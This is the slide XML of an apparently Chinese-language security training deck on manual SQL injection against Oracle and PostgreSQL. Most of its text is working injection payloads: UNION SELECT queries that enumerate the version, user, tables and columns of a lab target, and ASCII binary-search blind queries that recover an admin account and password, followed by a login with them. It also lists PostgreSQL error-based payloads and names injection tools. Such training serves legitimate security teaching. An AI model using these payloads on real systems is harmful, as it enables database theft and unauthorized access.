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305" r:id="rId3"/>
    <p:sldId id="30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07" r:id="rId33"/>
    <p:sldId id="308" r:id="rId34"/>
    <p:sldId id="309" r:id="rId35"/>
    <p:sldId id="292" r:id="rId36"/>
    <p:sldId id="293" r:id="rId37"/>
    <p:sldId id="294" r:id="rId38"/>
    <p:sldId id="295" r:id="rId39"/>
    <p:sldId id="310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BE4"/>
    <a:srgbClr val="7DE2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714" y="2500439"/>
            <a:ext cx="7142573" cy="100952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4714" y="3602038"/>
            <a:ext cx="7142573" cy="56181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03102"/>
            <a:ext cx="12192000" cy="2548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安全培训         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>http://www.cracer.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1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86080" y="544830"/>
            <a:ext cx="5994400" cy="649605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zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="668BE4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12775" y="1538571"/>
            <a:ext cx="10515600" cy="4207859"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr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zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="668BE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C58B-1263-4BF1-AC00-D94967AC2837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2E82-1B0D-4500-9A39-2FD7D9C8CF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64970" y="1818640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928806" y="495632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solidFill>
                <a:srgbClr val="1BA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7096" y="5414799"/>
              <a:ext cx="1496695" cy="397510"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1BA0C9"/>
              </a:solidFill>
            </a:ln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en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>BY    Cracer</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3106" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2251075" y="2193290"/>
            <a:ext cx="7235825" cy="1439863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1BA0C9"/>
          </a:solidFill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WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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安全测试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Oracle&amp;postgresql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注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" kern="120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获取数据库版本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>(select banner from sys.v_$version where rownum=1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取操作系统版本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>( select member from v$logfile where rownum=1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>获取连接数据库的当前用户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( select SYS_CONTEXT ('USERENV','CURRENT_USER')from dual)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取数据库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>(select owner from all_tables where rownum=1)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获取数据库版本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http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=100 union select null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null,null,null,null,null from dual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4" y="3486684"/>
            <a:ext cx="9159267" cy="23392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获取操作系统版本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http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=100 union select null,( select member from v$logfile where rownum=1),null,null,null,null,null,null,null,null,null from dual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46" y="3603336"/>
            <a:ext cx="8924462" cy="22484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获取连接数据库的当前用户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http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=100 union select null,( select SYS_CONTEXT ('USERENV','CURRENT_USER')from dual),null,null,null,null,null,null,null,null,null from dual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51" y="3452501"/>
            <a:ext cx="8927295" cy="2256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获取第一个表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http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=100 union select null,( select table_name from user_tables where rownum=1),null,null,null,null,null,null,null,null,null from dual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68" y="3268666"/>
            <a:ext cx="9650979" cy="25500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获取第二个表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http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=100 union select null,( select table_name from user_tables where rownum=1 and table_name&lt;&gt;'ACCESS$'),null,null,null,null,null,null,null,null,null from dual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66" y="3856706"/>
            <a:ext cx="8729695" cy="20305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获取第三个表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160"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=100 union select null,( select table_name from user_tables where rownum=1 and table_name&lt;&gt;'ACCESS$'and table_name&lt;&gt;'ALERT_QT'),null,null,null,null,null,null,null,null,null from dual    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>以此类推就可以得到所有的表名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3966210"/>
            <a:ext cx="8437880" cy="2395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获取第一个列名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假设我们得到管理员表名为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>获取第一个列名EMPLOYEE_ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=-100 union select null,(select column_name from user_tab_columns where table_name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>' and rownum=1),4,5,6 from dual,null,null,null,null,null,null,null,null,null from dual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获取第二个表名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http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=-100 union select null,(select column_name from user_tab_columns where table_name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>' and rownum=1 and column_name&lt;&gt;'EMPLOYEE_ID'),4,5,6 from dual,null,null,null,null,null,null,null,null,null from dual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>得到表名为NAME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获取第三个表名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http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=-100 union select null,(select column_name from user_tab_columns where table_name='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' and rownum=1 and column_name&lt;&gt;'EMPLOYEE_ID' and rownum=1 and column_name&lt;&gt;'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'),4,5,6 from dual,null,null,null,null,null,null,null,null,null from dual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得到表名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PASS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590925" cy="6899910"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="5561351" cy="6899639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5561351" cy="6858002"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a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  <a14:imgEffect>
                          <a14:saturation sat="2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119980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"/>
              <a:ext cx="5561351" cy="6899639"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="157E9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1855" y="887730"/>
            <a:ext cx="16605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evenim MT" panose="02010502060101010101" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>目录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07150" y="174498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Oracle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手工注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="矩形 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5736590" y="18472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077585" y="22047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9850" y="2481580"/>
            <a:ext cx="3398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Oracle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注入工具使用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5749290" y="25838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90285" y="29413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29375" y="3215005"/>
            <a:ext cx="3871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Postgresql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注入利用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758815" y="33172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6099810" y="36747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2075" y="3951605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Postgresql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写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shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="矩形 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5771515" y="40538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112510" y="44113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union select 1,2,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>,4,5,6 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>union select 1,2,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,4,5,6 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>admin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第二种注入方式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判断一下数据库中的表，网址后加上：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and (select count(*) from admin) &lt;&gt;0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>返回正常，说明存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>表。如果返回错误，可将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>username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manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等常用表名继续猜解。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15363" name="图片 6" descr="IMG_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3329940"/>
            <a:ext cx="6208395" cy="3020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判断下该网站下有几个管理员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如果有多个的话，成功入侵的几率就会加大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and (select count(*) from admin)=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，返回正常说明只有一个管理员。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16387" name="图片 7" descr="IMG_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0" y="2990215"/>
            <a:ext cx="6980555" cy="2941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指定表名获取列名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and (select count(name) from admin)&gt;=0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>返回正常，说明存在</a:t>
            </a:r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name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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7411" name="图片 8" descr="IMG_2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2580958"/>
            <a:ext cx="7785100" cy="371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获取列名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and (select count(pass) from admin)&gt;=0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>返回错误，说明不存在</a:t>
            </a:r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pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18435" name="图片 9" descr="IMG_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3248025"/>
            <a:ext cx="3637280" cy="1947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10" descr="IMG_2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65" y="3146425"/>
            <a:ext cx="4836160" cy="2150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>
                <a:solidFill>
                  <a:srgbClr val="E24C4B"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>接下来采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E24C4B"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E24C4B"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>码折半法猜解管理员帐号和密码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010" y="1905139"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断管理员名字长度</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and (select count(*) from admin where length(name)&gt;=5)=1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说明：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>length()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数用于求字符串的长度，此处猜测用户名的长度和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比较，即猜测是否由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个字符组成</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20484" name="图片 11" descr="IMG_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50" y="3842520"/>
            <a:ext cx="5790921" cy="253359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355" y="932926"/>
            <a:ext cx="11218388" cy="1203860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rgbClr val="E24C4B"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and (select count(*) from admin where ascii(substr(name,1,1))&gt;=97)=1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN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932" y="1945065"/>
            <a:ext cx="10515600" cy="435133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说明：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>substr()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数用于截取字符串，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ascii()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数用于获取字符的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>码，此处的意思是截取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字段的第一个字符，获取它的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>码值，查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>码表可知</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>97</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21508" name="图片 12" descr="IMG_2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5" y="3532366"/>
            <a:ext cx="6249074" cy="2514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0594" y="1999715"/>
            <a:ext cx="9972405" cy="93688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      and (select count(*) from admin where ascii(substr(name,2,1))&gt;=100)=1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结果为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100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，即字符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d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，重复上述过程，可以判断出帐号为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admin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2531" name="图片 13" descr="IMG_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5" y="3081796"/>
            <a:ext cx="6387898" cy="2692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相同的方法猜解密码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555" name="文本占位符 22530"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850337" y="2330558"/>
            <a:ext cx="10404474" cy="85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 and (select count(*) from admin where length(pwd)&gt;=8)=1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，返回正常，即密码长度为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，此时可以判断密码应该为明文</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23556" name="图片 14" descr="IMG_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02" y="3276156"/>
            <a:ext cx="6614148" cy="27341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952" y="1980568"/>
            <a:ext cx="9888020" cy="120386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    and (select count(*) from admin where ascii(substr(pwd,1,1))&gt;=97)=1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，返回正常，为字符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a</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="29FF8A"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A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579" name="图片 15" descr="IMG_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64" y="3295264"/>
            <a:ext cx="6858965" cy="26784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1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Oracle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>手工注入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4577"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="978998" y="1634353"/>
            <a:ext cx="11055350" cy="2613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</a:rPr>
              <a:t>and (select count(*) from admin where ascii(substr(pwd,2,1))&gt;=100)=1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，返回正常，为字符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</a:rPr>
              <a:t>d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/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</a:rPr>
              <a:t>      and (select count(*) from admin where ascii(substr(pwd,8,1))&gt;=56)=1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，返回正常，为数字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</a:rPr>
              <a:t>8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25603" name="图片 16" descr="IMG_2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56" y="3098705"/>
            <a:ext cx="7410463" cy="28817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5601"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913638" y="1952285"/>
            <a:ext cx="9824340" cy="1226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完成上述操作可以确定帐号为：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admin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密码为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:admin888</a:t>
            </a:r>
          </a:p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打开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http://10.1.1.59/login.jsp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，输入猜解出的用户名和密码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 17" descr="IMG_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6" y="3639820"/>
            <a:ext cx="5267325" cy="149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图片 18" descr="IMG_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65" y="3639820"/>
            <a:ext cx="5276850" cy="158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2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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Oracle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>注入工具使用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注入工具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sqlmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>穿山甲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3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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Postgresql </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>手工注入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介绍 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30723" name="内容占位符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06" y="2002216"/>
            <a:ext cx="3380420" cy="20318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文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110405" y="4149576"/>
            <a:ext cx="9696450" cy="192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幼圆" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>PostgreSQL是以加州大学伯克利分校计算机系开发的 POSTGRES，现在已经更名为PostgreSQL，版本 4.2为基础的对象关系型数据库管理系统（ORDBMS）。PostgreSQL支持大部分 SQL标准并且提供了许多其他现代特性：复杂查询、外键、触发器、视图、事务完整性、MVCC。同样，PostgreSQL 可以用许多方法扩展，比如， 通过增加新的数据类型、函数、操作符、聚集函数、索引。免费使用、修改、和分发 PostgreSQL，不管是私用、商用、还是学术研究使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="29FF8A"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="幼圆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ym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库注入常用语法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49875" cy="4351655"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="82500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>判断是否为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>数据库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+and+1::int=1--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http://mysql.sql.com/sql.php?id=1+and+1::int=1--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判断数据库版本信息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+and+1=cast(version() as int)--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判断当前用户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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  and 1=cast(user||123 as int)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
              <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>判断有多少字段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en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>order by </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>union select null,null,null</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>union select null,user,null   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>判断当前用户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ym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
